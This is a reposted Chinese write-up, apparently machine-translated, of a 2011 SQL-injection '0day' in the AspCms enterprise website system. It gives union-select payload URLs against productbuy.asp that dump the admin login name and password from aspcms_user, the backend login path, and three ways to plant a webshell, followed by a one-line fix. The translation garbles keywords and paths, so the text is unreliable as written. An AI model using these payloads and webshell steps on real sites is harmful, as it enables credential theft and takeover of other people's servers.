在AspCms企业大厦系统0day漏洞介绍

在AspCms企业大厦系统0day漏洞介绍
点评:开源的企业管理系统的新的核0day AspCms企业管理制度超过2。2011-08-14 19:21aspcms发展,各种企业网站需要的能力,并支持模板定制的扩展等,在短时间内完成企业网站。

此漏洞发生在
/ / productbuy.asp插头
由于未接收到的参数id的过滤而导致的注入漏洞
注射后的页面有一个跳跃,所以它很快,建议用快捷键复制
用户
/ / productbuy插头。Aspid = 2 +协会+选择+ 1,2,登录名,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37 + + + + UserID = 1,aspcms_user
这是爆炸的ID = 1的帐户名称,如果发现是不够的,你可以试试、…

起爆密码
/ / productbuy插头。Aspid = 2 +协会+选择+ 1,2,密码,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37 + + + + UserID = 1,aspcms_user

后台登录地址: / / admin login.asp

后台的壳
1,直接上传
2。系统配置信息
3、模板管理新1.asp模板,内容写马的内容。

修复方法:ID Cint(请求(ID))
免责声明:本网信息来自于互联网,目的在于传递更多信息,并不代表本网赞同其观点。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,并请自行核实相关内容。本站不承担此类作品侵权行为的直接责任及连带责任。如若本网有任何内容侵犯您的权益,请及时联系我们,本站将会在24小时内处理完毕。
相关文章
返回顶部